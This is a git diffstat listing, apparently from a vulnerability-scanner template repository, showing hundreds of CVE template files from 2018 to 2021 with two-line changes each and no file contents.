http/cves/2018/CVE-2018-19915.yaml | 2 +- http/cves/2018/CVE-2018-20009.yaml | 2 +- http/cves/2018/CVE-2018-20470.yaml | 2 +- http/cves/2018/CVE-2018-20526.yaml | 2 +- http/cves/2018/CVE-2018-20824.yaml | 2 +- http/cves/2018/CVE-2018-20985.yaml | 2 +- http/cves/2018/CVE-2018-2791.yaml | 2 +- http/cves/2018/CVE-2018-2894.yaml | 2 +- http/cves/2018/CVE-2018-3167.yaml | 2 +- http/cves/2018/CVE-2018-3238.yaml | 2 +- http/cves/2018/CVE-2018-5230.yaml | 2 +- http/cves/2018/CVE-2018-5233.yaml | 2 +- http/cves/2018/CVE-2018-5715.yaml | 2 +- http/cves/2018/CVE-2018-6008.yaml | 2 +- http/cves/2018/CVE-2018-6184.yaml | 2 +- http/cves/2018/CVE-2018-6200.yaml | 2 +- http/cves/2018/CVE-2018-6910.yaml | 2 +- http/cves/2018/CVE-2018-7251.yaml | 2 +- http/cves/2018/CVE-2018-7282.yaml | 2 +- http/cves/2018/CVE-2018-7467.yaml | 2 +- http/cves/2018/CVE-2018-7600.yaml | 2 +- http/cves/2018/CVE-2018-7602.yaml | 2 +- http/cves/2018/CVE-2018-7653.yaml | 2 +- http/cves/2018/CVE-2018-7662.yaml | 2 +- http/cves/2018/CVE-2018-7700.yaml | 2 +- http/cves/2018/CVE-2018-8006.yaml | 2 +- http/cves/2018/CVE-2018-8033.yaml | 2 +- http/cves/2018/CVE-2018-8715.yaml | 2 +- http/cves/2018/CVE-2018-8719.yaml | 2 +- http/cves/2018/CVE-2018-8823.yaml | 2 +- http/cves/2018/CVE-2018-9118.yaml | 2 +- http/cves/2018/CVE-2018-9205.yaml | 2 +- http/cves/2019/CVE-2019-0193.yaml | 2 +- http/cves/2019/CVE-2019-0221.yaml | 2 +- http/cves/2019/CVE-2019-0230.yaml | 2 +- http/cves/2019/CVE-2019-10068.yaml | 2 +- http/cves/2019/CVE-2019-10092.yaml | 2 +- http/cves/2019/CVE-2019-10098.yaml | 2 +- http/cves/2019/CVE-2019-1010290.yaml | 2 +- http/cves/2019/CVE-2019-10405.yaml | 2 +- http/cves/2019/CVE-2019-10475.yaml | 2 +- http/cves/2019/CVE-2019-10692.yaml | 2 +- http/cves/2019/CVE-2019-10717.yaml | 2 +- http/cves/2019/CVE-2019-10758.yaml | 2 +- http/cves/2019/CVE-2019-11248.yaml | 2 +- http/cves/2019/CVE-2019-11370.yaml | 2 +- http/cves/2019/CVE-2019-11510.yaml | 2 +- http/cves/2019/CVE-2019-11580.yaml | 2 +- http/cves/2019/CVE-2019-11581.yaml | 2 +- http/cves/2019/CVE-2019-11869.yaml | 2 +- http/cves/2019/CVE-2019-12276.yaml | 2 +- http/cves/2019/CVE-2019-12314.yaml | 2 +- http/cves/2019/CVE-2019-12461.yaml | 2 +- http/cves/2019/CVE-2019-12581.yaml | 2 +- http/cves/2019/CVE-2019-12583.yaml | 2 +- http/cves/2019/CVE-2019-12593.yaml | 2 +- http/cves/2019/CVE-2019-12616.yaml | 2 +- http/cves/2019/CVE-2019-12725.yaml | 2 +- http/cves/2019/CVE-2019-12962.yaml | 2 +- http/cves/2019/CVE-2019-12985.yaml | 2 +- http/cves/2019/CVE-2019-12986.yaml | 2 +- http/cves/2019/CVE-2019-12987.yaml | 2 +- http/cves/2019/CVE-2019-12988.yaml | 2 +- http/cves/2019/CVE-2019-12990.yaml | 2 +- http/cves/2019/CVE-2019-13101.yaml | 2 +- http/cves/2019/CVE-2019-13392.yaml | 2 +- http/cves/2019/CVE-2019-13396.yaml | 2 +- http/cves/2019/CVE-2019-13462.yaml | 2 +- http/cves/2019/CVE-2019-14205.yaml | 2 +- http/cves/2019/CVE-2019-14223.yaml | 2 +- http/cves/2019/CVE-2019-14251.yaml | 2 +- http/cves/2019/CVE-2019-14312.yaml | 2 +- http/cves/2019/CVE-2019-14322.yaml | 2 +- http/cves/2019/CVE-2019-14530.yaml | 2 +- http/cves/2019/CVE-2019-14696.yaml | 2 +- http/cves/2019/CVE-2019-14750.yaml | 2 +- http/cves/2019/CVE-2019-14789.yaml | 2 +- http/cves/2019/CVE-2019-14974.yaml | 2 +- http/cves/2019/CVE-2019-15043.yaml | 2 +- http/cves/2019/CVE-2019-15107.yaml | 2 +- http/cves/2019/CVE-2019-15501.yaml | 2 +- http/cves/2019/CVE-2019-15642.yaml | 2 +- http/cves/2019/CVE-2019-15713.yaml | 2 +- http/cves/2019/CVE-2019-15829.yaml | 2 +- http/cves/2019/CVE-2019-15858.yaml | 2 +- http/cves/2019/CVE-2019-15889.yaml | 2 +- http/cves/2019/CVE-2019-16057.yaml | 2 +- http/cves/2019/CVE-2019-16097.yaml | 2 +- http/cves/2019/CVE-2019-16278.yaml | 2 +- http/cves/2019/CVE-2019-16469.yaml | 2 +- http/cves/2019/CVE-2019-16662.yaml | 2 +- http/cves/2019/CVE-2019-16759.yaml | 2 +- http/cves/2019/CVE-2019-16931.yaml | 2 +- http/cves/2019/CVE-2019-16997.yaml | 2 +- http/cves/2019/CVE-2019-17382.yaml | 2 +- http/cves/2019/CVE-2019-17444.yaml | 2 +- http/cves/2019/CVE-2019-17538.yaml | 2 +- http/cves/2019/CVE-2019-17558.yaml | 2 +- http/cves/2019/CVE-2019-17574.yaml | 2 +- http/cves/2019/CVE-2019-17662.yaml | 2 +- http/cves/2019/CVE-2019-1821.yaml | 2 +- http/cves/2019/CVE-2019-18371.yaml | 2 +- http/cves/2019/CVE-2019-18393.yaml | 2 +- http/cves/2019/CVE-2019-18394.yaml | 2 +- http/cves/2019/CVE-2019-1898.yaml | 2 +- http/cves/2019/CVE-2019-19368.yaml | 2 +- http/cves/2019/CVE-2019-20085.yaml | 2 +- http/cves/2019/CVE-2019-20141.yaml | 2 +- http/cves/2019/CVE-2019-20210.yaml | 2 +- http/cves/2019/CVE-2019-20224.yaml | 2 +- http/cves/2019/CVE-2019-20933.yaml | 2 +- http/cves/2019/CVE-2019-2616.yaml | 2 +- http/cves/2019/CVE-2019-2729.yaml | 2 +- http/cves/2019/CVE-2019-3398.yaml | 2 +- http/cves/2019/CVE-2019-3403.yaml | 2 +- http/cves/2019/CVE-2019-3799.yaml | 2 +- http/cves/2019/CVE-2019-3911.yaml | 2 +- http/cves/2019/CVE-2019-3912.yaml | 2 +- http/cves/2019/CVE-2019-3929.yaml | 2 +- http/cves/2019/CVE-2019-5127.yaml | 2 +- http/cves/2019/CVE-2019-5418.yaml | 2 +- http/cves/2019/CVE-2019-5434.yaml | 2 +- http/cves/2019/CVE-2019-6112.yaml | 2 +- http/cves/2019/CVE-2019-6340.yaml | 2 +- http/cves/2019/CVE-2019-6715.yaml | 2 +- http/cves/2019/CVE-2019-6799.yaml | 2 +- http/cves/2019/CVE-2019-6802.yaml | 2 +- http/cves/2019/CVE-2019-7192.yaml | 2 +- http/cves/2019/CVE-2019-7219.yaml | 2 +- http/cves/2019/CVE-2019-7238.yaml | 2 +- http/cves/2019/CVE-2019-7254.yaml | 2 +- http/cves/2019/CVE-2019-7255.yaml | 2 +- http/cves/2019/CVE-2019-7256.yaml | 2 +- http/cves/2019/CVE-2019-7315.yaml | 2 +- http/cves/2019/CVE-2019-7609.yaml | 2 +- http/cves/2019/CVE-2019-8086.yaml | 2 +- http/cves/2019/CVE-2019-8390.yaml | 2 +- http/cves/2019/CVE-2019-8442.yaml | 2 +- http/cves/2019/CVE-2019-8446.yaml | 2 +- http/cves/2019/CVE-2019-8449.yaml | 2 +- http/cves/2019/CVE-2019-8937.yaml | 2 +- http/cves/2019/CVE-2019-8982.yaml | 2 +- http/cves/2019/CVE-2019-9618.yaml | 2 +- http/cves/2019/CVE-2019-9632.yaml | 2 +- http/cves/2019/CVE-2019-9670.yaml | 2 +- http/cves/2019/CVE-2019-9726.yaml | 2 +- http/cves/2019/CVE-2019-9733.yaml | 2 +- http/cves/2019/CVE-2019-9915.yaml | 2 +- http/cves/2019/CVE-2019-9922.yaml | 2 +- http/cves/2020/CVE-2020-0618.yaml | 2 +- http/cves/2020/CVE-2020-10199.yaml | 2 +- http/cves/2020/CVE-2020-10220.yaml | 2 +- http/cves/2020/CVE-2020-10546.yaml | 2 +- http/cves/2020/CVE-2020-10547.yaml | 2 +- http/cves/2020/CVE-2020-10548.yaml | 2 +- http/cves/2020/CVE-2020-10549.yaml | 2 +- http/cves/2020/CVE-2020-10770.yaml | 2 +- http/cves/2020/CVE-2020-10973.yaml | 2 +- http/cves/2020/CVE-2020-11034.yaml | 2 +- http/cves/2020/CVE-2020-11110.yaml | 2 +- http/cves/2020/CVE-2020-11450.yaml | 2 +- http/cves/2020/CVE-2020-11530.yaml | 2 +- http/cves/2020/CVE-2020-11546.yaml | 2 +- http/cves/2020/CVE-2020-11547.yaml | 2 +- http/cves/2020/CVE-2020-11710.yaml | 2 +- http/cves/2020/CVE-2020-11738.yaml | 2 +- http/cves/2020/CVE-2020-11798.yaml | 2 +- http/cves/2020/CVE-2020-11853.yaml | 2 +- http/cves/2020/CVE-2020-11854.yaml | 2 +- http/cves/2020/CVE-2020-11930.yaml | 2 +- http/cves/2020/CVE-2020-11978.yaml | 2 +- http/cves/2020/CVE-2020-11991.yaml | 2 +- http/cves/2020/CVE-2020-12054.yaml | 2 +- http/cves/2020/CVE-2020-12116.yaml | 2 +- http/cves/2020/CVE-2020-12124.yaml | 2 +- http/cves/2020/CVE-2020-12127.yaml | 2 +- http/cves/2020/CVE-2020-12256.yaml | 2 +- http/cves/2020/CVE-2020-12259.yaml | 2 +- http/cves/2020/CVE-2020-12478.yaml | 2 +- http/cves/2020/CVE-2020-12720.yaml | 2 +- http/cves/2020/CVE-2020-13117.yaml | 2 +- http/cves/2020/CVE-2020-13121.yaml | 2 +- http/cves/2020/CVE-2020-13158.yaml | 2 +- http/cves/2020/CVE-2020-13167.yaml | 2 +- http/cves/2020/CVE-2020-13258.yaml | 2 +- http/cves/2020/CVE-2020-13379.yaml | 2 +- http/cves/2020/CVE-2020-13405.yaml | 2 +- http/cves/2020/CVE-2020-13483.yaml | 2 +- http/cves/2020/CVE-2020-13638.yaml | 2 +- http/cves/2020/CVE-2020-13820.yaml | 2 +- http/cves/2020/CVE-2020-13851.yaml | 2 +- http/cves/2020/CVE-2020-13927.yaml | 2 +- http/cves/2020/CVE-2020-13937.yaml | 2 +- http/cves/2020/CVE-2020-13945.yaml | 2 +- http/cves/2020/CVE-2020-14144.yaml | 2 +- http/cves/2020/CVE-2020-14179.yaml | 2 +- http/cves/2020/CVE-2020-14181.yaml | 2 +- http/cves/2020/CVE-2020-14408.yaml | 2 +- http/cves/2020/CVE-2020-14413.yaml | 2 +- http/cves/2020/CVE-2020-14750.yaml | 2 +- http/cves/2020/CVE-2020-14864.yaml | 2 +- http/cves/2020/CVE-2020-14882.yaml | 2 +- http/cves/2020/CVE-2020-14883.yaml | 2 +- http/cves/2020/CVE-2020-15129.yaml | 2 +- http/cves/2020/CVE-2020-15148.yaml | 2 +- http/cves/2020/CVE-2020-15227.yaml | 2 +- http/cves/2020/CVE-2020-15500.yaml | 2 +- http/cves/2020/CVE-2020-15568.yaml | 2 +- http/cves/2020/CVE-2020-15867.yaml | 2 +- http/cves/2020/CVE-2020-15895.yaml | 2 +- http/cves/2020/CVE-2020-16139.yaml | 2 +- http/cves/2020/CVE-2020-16846.yaml | 2 +- http/cves/2020/CVE-2020-16952.yaml | 2 +- http/cves/2020/CVE-2020-17362.yaml | 2 +- http/cves/2020/CVE-2020-17453.yaml | 2 +- http/cves/2020/CVE-2020-17456.yaml | 2 +- http/cves/2020/CVE-2020-17463.yaml | 2 +- http/cves/2020/CVE-2020-17496.yaml | 2 +- http/cves/2020/CVE-2020-17505.yaml | 2 +- http/cves/2020/CVE-2020-17519.yaml | 2 +- http/cves/2020/CVE-2020-17526.yaml | 2 +- http/cves/2020/CVE-2020-17530.yaml | 2 +- http/cves/2020/CVE-2020-18268.yaml | 2 +- http/cves/2020/CVE-2020-19282.yaml | 2 +- http/cves/2020/CVE-2020-19283.yaml | 2 +- http/cves/2020/CVE-2020-19360.yaml | 2 +- http/cves/2020/CVE-2020-1943.yaml | 2 +- http/cves/2020/CVE-2020-19515.yaml | 2 +- http/cves/2020/CVE-2020-1956.yaml | 2 +- http/cves/2020/CVE-2020-20285.yaml | 2 +- http/cves/2020/CVE-2020-20300.yaml | 2 +- http/cves/2020/CVE-2020-2036.yaml | 2 +- http/cves/2020/CVE-2020-2096.yaml | 2 +- http/cves/2020/CVE-2020-20982.yaml | 2 +- http/cves/2020/CVE-2020-21012.yaml | 2 +- http/cves/2020/CVE-2020-2103.yaml | 2 +- http/cves/2020/CVE-2020-2140.yaml | 2 +- http/cves/2020/CVE-2020-22208.yaml | 2 +- http/cves/2020/CVE-2020-22209.yaml | 2 +- http/cves/2020/CVE-2020-22210.yaml | 2 +- http/cves/2020/CVE-2020-22211.yaml | 2 +- http/cves/2020/CVE-2020-23015.yaml | 2 +- http/cves/2020/CVE-2020-23517.yaml | 2 +- http/cves/2020/CVE-2020-23575.yaml | 2 +- http/cves/2020/CVE-2020-23697.yaml | 2 +- http/cves/2020/CVE-2020-24148.yaml | 2 +- http/cves/2020/CVE-2020-24186.yaml | 2 +- http/cves/2020/CVE-2020-24312.yaml | 2 +- http/cves/2020/CVE-2020-24391.yaml | 2 +- http/cves/2020/CVE-2020-24579.yaml | 2 +- http/cves/2020/CVE-2020-24589.yaml | 2 +- http/cves/2020/CVE-2020-24701.yaml | 2 +- http/cves/2020/CVE-2020-24902.yaml | 2 +- http/cves/2020/CVE-2020-24903.yaml | 2 +- http/cves/2020/CVE-2020-24912.yaml | 2 +- http/cves/2020/CVE-2020-25213.yaml | 2 +- http/cves/2020/CVE-2020-25223.yaml | 2 +- http/cves/2020/CVE-2020-25506.yaml | 2 +- http/cves/2020/CVE-2020-2551.yaml | 2 +- http/cves/2020/CVE-2020-25540.yaml | 2 +- http/cves/2020/CVE-2020-25864.yaml | 2 +- http/cves/2020/CVE-2020-26214.yaml | 2 +- http/cves/2020/CVE-2020-26217.yaml | 2 +- http/cves/2020/CVE-2020-26413.yaml | 2 +- http/cves/2020/CVE-2020-26948.yaml | 2 +- http/cves/2020/CVE-2020-2733.yaml | 2 +- http/cves/2020/CVE-2020-27467.yaml | 2 +- http/cves/2020/CVE-2020-27481.yaml | 2 +- http/cves/2020/CVE-2020-27838.yaml | 2 +- http/cves/2020/CVE-2020-27866.yaml | 2 +- http/cves/2020/CVE-2020-27982.yaml | 2 +- http/cves/2020/CVE-2020-27986.yaml | 2 +- http/cves/2020/CVE-2020-28185.yaml | 2 +- http/cves/2020/CVE-2020-28188.yaml | 2 +- http/cves/2020/CVE-2020-28208.yaml | 2 +- http/cves/2020/CVE-2020-28871.yaml | 2 +- http/cves/2020/CVE-2020-29164.yaml | 2 +- http/cves/2020/CVE-2020-29227.yaml | 2 +- http/cves/2020/CVE-2020-29284.yaml | 2 +- http/cves/2020/CVE-2020-29395.yaml | 2 +- http/cves/2020/CVE-2020-29583.yaml | 2 +- http/cves/2020/CVE-2020-3452.yaml | 2 +- http/cves/2020/CVE-2020-35234.yaml | 2 +- http/cves/2020/CVE-2020-35338.yaml | 2 +- http/cves/2020/CVE-2020-35476.yaml | 2 +- http/cves/2020/CVE-2020-35489.yaml | 2 +- http/cves/2020/CVE-2020-35580.yaml | 2 +- http/cves/2020/CVE-2020-35598.yaml | 2 +- http/cves/2020/CVE-2020-35713.yaml | 2 +- http/cves/2020/CVE-2020-35736.yaml | 2 +- http/cves/2020/CVE-2020-3580.yaml | 2 +- http/cves/2020/CVE-2020-35846.yaml | 2 +- http/cves/2020/CVE-2020-35847.yaml | 2 +- http/cves/2020/CVE-2020-35848.yaml | 2 +- http/cves/2020/CVE-2020-35984.yaml | 2 +- http/cves/2020/CVE-2020-35985.yaml | 2 +- http/cves/2020/CVE-2020-35986.yaml | 2 +- http/cves/2020/CVE-2020-35987.yaml | 2 +- http/cves/2020/CVE-2020-36112.yaml | 2 +- http/cves/2020/CVE-2020-36289.yaml | 2 +- http/cves/2020/CVE-2020-36365.yaml | 2 +- http/cves/2020/CVE-2020-4463.yaml | 2 +- http/cves/2020/CVE-2020-5191.yaml | 2 +- http/cves/2020/CVE-2020-5192.yaml | 2 +- http/cves/2020/CVE-2020-5284.yaml | 2 +- http/cves/2020/CVE-2020-5410.yaml | 2 +- http/cves/2020/CVE-2020-5777.yaml | 2 +- http/cves/2020/CVE-2020-5902.yaml | 2 +- http/cves/2020/CVE-2020-6171.yaml | 2 +- http/cves/2020/CVE-2020-6207.yaml | 2 +- http/cves/2020/CVE-2020-6287.yaml | 2 +- http/cves/2020/CVE-2020-6637.yaml | 2 +- http/cves/2020/CVE-2020-6950.yaml | 2 +- http/cves/2020/CVE-2020-7107.yaml | 2 +- http/cves/2020/CVE-2020-7136.yaml | 2 +- http/cves/2020/CVE-2020-7318.yaml | 2 +- http/cves/2020/CVE-2020-7796.yaml | 2 +- http/cves/2020/CVE-2020-7943.yaml | 2 +- http/cves/2020/CVE-2020-7961.yaml | 2 +- http/cves/2020/CVE-2020-7980.yaml | 2 +- http/cves/2020/CVE-2020-8115.yaml | 2 +- http/cves/2020/CVE-2020-8163.yaml | 2 +- http/cves/2020/CVE-2020-8191.yaml | 2 +- http/cves/2020/CVE-2020-8193.yaml | 2 +- http/cves/2020/CVE-2020-8497.yaml | 2 +- http/cves/2020/CVE-2020-8512.yaml | 2 +- http/cves/2020/CVE-2020-8515.yaml | 2 +- http/cves/2020/CVE-2020-8615.yaml | 2 +- http/cves/2020/CVE-2020-8641.yaml | 2 +- http/cves/2020/CVE-2020-8644.yaml | 2 +- http/cves/2020/CVE-2020-8772.yaml | 2 +- http/cves/2020/CVE-2020-8813.yaml | 2 +- http/cves/2020/CVE-2020-8982.yaml | 2 +- http/cves/2020/CVE-2020-9036.yaml | 2 +- http/cves/2020/CVE-2020-9315.yaml | 2 +- http/cves/2020/CVE-2020-9344.yaml | 2 +- http/cves/2020/CVE-2020-9376.yaml | 2 +- http/cves/2020/CVE-2020-9402.yaml | 2 +- http/cves/2020/CVE-2020-9425.yaml | 2 +- http/cves/2020/CVE-2020-9484.yaml | 2 +- http/cves/2020/CVE-2020-9496.yaml | 2 +- http/cves/2020/CVE-2020-9757.yaml | 2 +- http/cves/2021/CVE-2021-1472.yaml | 2 +- http/cves/2021/CVE-2021-1498.yaml | 2 +- http/cves/2021/CVE-2021-1499.yaml | 2 +- http/cves/2021/CVE-2021-20031.yaml | 2 +- http/cves/2021/CVE-2021-20091.yaml | 2 +- http/cves/2021/CVE-2021-20114.yaml | 2 +- http/cves/2021/CVE-2021-20123.yaml | 2 +- http/cves/2021/CVE-2021-20124.yaml | 2 +- http/cves/2021/CVE-2021-20137.yaml | 2 +- http/cves/2021/CVE-2021-20150.yaml | 2 +- http/cves/2021/CVE-2021-20158.yaml | 2 +- http/cves/2021/CVE-2021-20167.yaml | 2 +- http/cves/2021/CVE-2021-20323.yaml | 2 +- http/cves/2021/CVE-2021-20792.yaml | 2 +- http/cves/2021/CVE-2021-20837.yaml | 2 +- http/cves/2021/CVE-2021-21087.yaml | 2 +- http/cves/2021/CVE-2021-21234.yaml | 2 +- http/cves/2021/CVE-2021-21287.yaml | 2 +- http/cves/2021/CVE-2021-21307.yaml | 2 +- http/cves/2021/CVE-2021-21311.yaml | 2 +- http/cves/2021/CVE-2021-21351.yaml | 2 +- http/cves/2021/CVE-2021-21389.yaml | 2 +- http/cves/2021/CVE-2021-21402.yaml | 2 +- http/cves/2021/CVE-2021-21745.yaml | 2 +- http/cves/2021/CVE-2021-21799.yaml | 2 +- http/cves/2021/CVE-2021-21800.yaml | 2 +- http/cves/2021/CVE-2021-21801.yaml | 2 +- http/cves/2021/CVE-2021-21802.yaml | 2 +- http/cves/2021/CVE-2021-21803.yaml | 2 +- http/cves/2021/CVE-2021-21805.yaml | 2 +- http/cves/2021/CVE-2021-21978.yaml | 2 +- http/cves/2021/CVE-2021-22005.yaml | 2 +- http/cves/2021/CVE-2021-22053.yaml | 2 +- http/cves/2021/CVE-2021-22054.yaml | 2 +- http/cves/2021/CVE-2021-22122.yaml | 2 +- http/cves/2021/CVE-2021-22145.yaml | 2 +- http/cves/2021/CVE-2021-22205.yaml | 2 +- http/cves/2021/CVE-2021-22214.yaml | 2 +- http/cves/2021/CVE-2021-22707.yaml | 2 +- http/cves/2021/CVE-2021-22873.yaml | 2 +- http/cves/2021/CVE-2021-22911.yaml | 2 +- http/cves/2021/CVE-2021-22986.yaml | 2 +- http/cves/2021/CVE-2021-24145.yaml | 2 +- http/cves/2021/CVE-2021-24165.yaml | 2 +- http/cves/2021/CVE-2021-24169.yaml | 2 +- http/cves/2021/CVE-2021-24214.yaml | 2 +- http/cves/2021/CVE-2021-24215.yaml | 2 +- http/cves/2021/CVE-2021-24227.yaml | 2 +- http/cves/2021/CVE-2021-24235.yaml | 2 +- http/cves/2021/CVE-2021-24237.yaml | 2 +- http/cves/2021/CVE-2021-24239.yaml | 2 +- http/cves/2021/CVE-2021-24275.yaml | 2 +- http/cves/2021/CVE-2021-24276.yaml | 2 +- http/cves/2021/CVE-2021-24278.yaml | 2 +- http/cves/2021/CVE-2021-24285.yaml | 2 +- http/cves/2021/CVE-2021-24286.yaml | 2 +- http/cves/2021/CVE-2021-24287.yaml | 2 +- http/cves/2021/CVE-2021-24288.yaml | 2 +- http/cves/2021/CVE-2021-24291.yaml | 2 +- http/cves/2021/CVE-2021-24316.yaml | 2 +- http/cves/2021/CVE-2021-24320.yaml | 2 +- http/cves/2021/CVE-2021-24340.yaml | 2 +- http/cves/2021/CVE-2021-24347.yaml | 2 +- http/cves/2021/CVE-2021-24351.yaml | 2 +- http/cves/2021/CVE-2021-24358.yaml | 2 +- http/cves/2021/CVE-2021-24409.yaml | 2 +- http/cves/2021/CVE-2021-24435.yaml | 2 +- http/cves/2021/CVE-2021-24442.yaml | 2 +- http/cves/2021/CVE-2021-24472.yaml | 2 +- http/cves/2021/CVE-2021-24495.yaml | 2 +- http/cves/2021/CVE-2021-24498.yaml | 2 +- http/cves/2021/CVE-2021-24510.yaml | 2 +- http/cves/2021/CVE-2021-24554.yaml | 2 +- http/cves/2021/CVE-2021-24627.yaml | 2 +- http/cves/2021/CVE-2021-24647.yaml | 2 +- http/cves/2021/CVE-2021-24731.yaml | 2 +- http/cves/2021/CVE-2021-24746.yaml | 2 +- http/cves/2021/CVE-2021-24750.yaml | 2 +- http/cves/2021/CVE-2021-24838.yaml | 2 +- http/cves/2021/CVE-2021-24849.yaml | 2 +- http/cves/2021/CVE-2021-24862.yaml | 2 +- http/cves/2021/CVE-2021-24875.yaml | 2 +- http/cves/2021/CVE-2021-24891.yaml | 2 +- http/cves/2021/CVE-2021-24915.yaml | 2 +- http/cves/2021/CVE-2021-24917.yaml | 2 +- http/cves/2021/CVE-2021-24926.yaml | 2 +- http/cves/2021/CVE-2021-24940.yaml | 2 +- http/cves/2021/CVE-2021-24943.yaml | 2 +- http/cves/2021/CVE-2021-24946.yaml | 2 +- http/cves/2021/CVE-2021-24947.yaml | 2 +- http/cves/2021/CVE-2021-24970.yaml | 2 +- http/cves/2021/CVE-2021-24979.yaml | 2 +- http/cves/2021/CVE-2021-25003.yaml | 2 +- http/cves/2021/CVE-2021-25008.yaml | 2 +- http/cves/2021/CVE-2021-25016.yaml | 2 +- http/cves/2021/CVE-2021-25033.yaml | 2 +- http/cves/2021/CVE-2021-25052.yaml | 2 +- http/cves/2021/CVE-2021-25063.yaml | 2 +- http/cves/2021/CVE-2021-25065.yaml | 2 +- http/cves/2021/CVE-2021-25067.yaml | 2 +- http/cves/2021/CVE-2021-25075.yaml | 2 +- http/cves/2021/CVE-2021-25078.yaml | 2 +- http/cves/2021/CVE-2021-25079.yaml | 2 +- http/cves/2021/CVE-2021-25085.yaml | 2 +- http/cves/2021/CVE-2021-25099.yaml | 2 +- http/cves/2021/CVE-2021-25111.yaml | 2 +- http/cves/2021/CVE-2021-25114.yaml | 2 +- http/cves/2021/CVE-2021-25120.yaml | 2 +- http/cves/2021/CVE-2021-25281.yaml | 2 +- http/cves/2021/CVE-2021-25296.yaml | 2 +- http/cves/2021/CVE-2021-25297.yaml | 2 +- http/cves/2021/CVE-2021-25298.yaml | 2 +- http/cves/2021/CVE-2021-25299.yaml | 2 +- http/cves/2021/CVE-2021-25646.yaml | 2 +- http/cves/2021/CVE-2021-25864.yaml | 2 +- http/cves/2021/CVE-2021-25899.yaml | 2 +- http/cves/2021/CVE-2021-26084.yaml | 2 +- http/cves/2021/CVE-2021-26085.yaml | 2 +- http/cves/2021/CVE-2021-26086.yaml | 2 +- http/cves/2021/CVE-2021-26247.yaml | 2 +- http/cves/2021/CVE-2021-26294.yaml | 2 +- http/cves/2021/CVE-2021-26295.yaml | 2 +- http/cves/2021/CVE-2021-26598.yaml | 2 +- http/cves/2021/CVE-2021-26702.yaml | 2 +- http/cves/2021/CVE-2021-26710.yaml | 2 +- http/cves/2021/CVE-2021-26723.yaml | 2 +- http/cves/2021/CVE-2021-26812.yaml | 2 +- http/cves/2021/CVE-2021-26855.yaml | 2 +- http/cves/2021/CVE-2021-27124.yaml | 2 +- http/cves/2021/CVE-2021-27309.yaml | 2 +- http/cves/2021/CVE-2021-27315.yaml | 2 +- http/cves/2021/CVE-2021-27319.yaml | 2 +- http/cves/2021/CVE-2021-27320.yaml | 2 +- http/cves/2021/CVE-2021-27330.yaml | 2 +- http/cves/2021/CVE-2021-27358.yaml | 2 +- http/cves/2021/CVE-2021-27519.yaml | 2 +- http/cves/2021/CVE-2021-27520.yaml | 2 +- http/cves/2021/CVE-2021-27561.yaml | 2 +- http/cves/2021/CVE-2021-27651.yaml | 2 +- http/cves/2021/CVE-2021-27670.yaml | 2 +- http/cves/2021/CVE-2021-27850.yaml | 2 +- http/cves/2021/CVE-2021-27905.yaml | 2 +- http/cves/2021/CVE-2021-27909.yaml | 2 +- http/cves/2021/CVE-2021-27931.yaml | 2 +- http/cves/2021/CVE-2021-28150.yaml | 2 +- http/cves/2021/CVE-2021-28164.yaml | 2 +- http/cves/2021/CVE-2021-28169.yaml | 2 +- http/cves/2021/CVE-2021-28377.yaml | 2 +- http/cves/2021/CVE-2021-28419.yaml | 2 +- http/cves/2021/CVE-2021-28937.yaml | 2 +- http/cves/2021/CVE-2021-29006.yaml | 2 +- http/cves/2021/CVE-2021-29156.yaml | 2 +- http/cves/2021/CVE-2021-29200.yaml | 2 +- http/cves/2021/CVE-2021-29203.yaml | 2 +- http/cves/2021/CVE-2021-29442.yaml | 2 +- http/cves/2021/CVE-2021-29484.yaml | 2 +- http/cves/2021/CVE-2021-29490.yaml | 2 +- http/cves/2021/CVE-2021-29622.yaml | 2 +- http/cves/2021/CVE-2021-29625.yaml | 2 +- http/cves/2021/CVE-2021-3002.yaml | 2 +- http/cves/2021/CVE-2021-30049.yaml | 2 +- http/cves/2021/CVE-2021-30128.yaml | 2 +- http/cves/2021/CVE-2021-30134.yaml | 2 +- http/cves/2021/CVE-2021-30151.yaml | 2 +- http/cves/2021/CVE-2021-3017.yaml | 2 +- http/cves/2021/CVE-2021-30175.yaml | 2 +- http/cves/2021/CVE-2021-3019.yaml | 2 +- http/cves/2021/CVE-2021-30213.yaml | 2 +- http/cves/2021/CVE-2021-30461.yaml | 2 +- http/cves/2021/CVE-2021-30497.yaml | 2 +- http/cves/2021/CVE-2021-3110.yaml | 2 +- http/cves/2021/CVE-2021-31195.yaml | 2 +- http/cves/2021/CVE-2021-31250.yaml | 2 +- http/cves/2021/CVE-2021-31537.yaml | 2 +- http/cves/2021/CVE-2021-31581.yaml | 2 +- http/cves/2021/CVE-2021-31589.yaml | 2 +- http/cves/2021/CVE-2021-31602.yaml | 2 +- http/cves/2021/CVE-2021-31682.yaml | 2 +- http/cves/2021/CVE-2021-31755.yaml | 2 +- http/cves/2021/CVE-2021-31805.yaml | 2 +- http/cves/2021/CVE-2021-31862.yaml | 2 +- http/cves/2021/CVE-2021-3223.yaml | 2 +- http/cves/2021/CVE-2021-32618.yaml | 2 +- http/cves/2021/CVE-2021-32820.yaml | 2 +- http/cves/2021/CVE-2021-32853.yaml | 2 +- http/cves/2021/CVE-2021-3297.yaml | 2 +- http/cves/2021/CVE-2021-33044.yaml | 2 +- http/cves/2021/CVE-2021-33221.yaml | 2 +- http/cves/2021/CVE-2021-33357.yaml | 2 +- http/cves/2021/CVE-2021-33690.yaml | 2 +- http/cves/2021/CVE-2021-3374.yaml | 2 +- http/cves/2021/CVE-2021-3377.yaml | 2 +- http/cves/2021/CVE-2021-33807.yaml | 2 +- http/cves/2021/CVE-2021-33851.yaml | 2 +- http/cves/2021/CVE-2021-33904.yaml | 2 +- http/cves/2021/CVE-2021-34429.yaml | 2 +- http/cves/2021/CVE-2021-34473.yaml | 2 +- http/cves/2021/CVE-2021-34640.yaml | 2 +- http/cves/2021/CVE-2021-34643.yaml | 2 +- http/cves/2021/CVE-2021-34805.yaml | 2 +- http/cves/2021/CVE-2021-35250.yaml | 2 +- http/cves/2021/CVE-2021-35265.yaml | 2 +- http/cves/2021/CVE-2021-35336.yaml | 2 +- http/cves/2021/CVE-2021-35395.yaml | 2 +- http/cves/2021/CVE-2021-35464.yaml | 2 +- http/cves/2021/CVE-2021-35488.yaml | 2 +- http/cves/2021/CVE-2021-35587.yaml | 2 +- http/cves/2021/CVE-2021-3577.yaml | 2 +- http/cves/2021/CVE-2021-36260.yaml | 2 +- http/cves/2021/CVE-2021-36356.yaml | 2 +- http/cves/2021/CVE-2021-36380.yaml | 2 +- http/cves/2021/CVE-2021-36450.yaml | 2 +- http/cves/2021/CVE-2021-3654.yaml | 2 +- 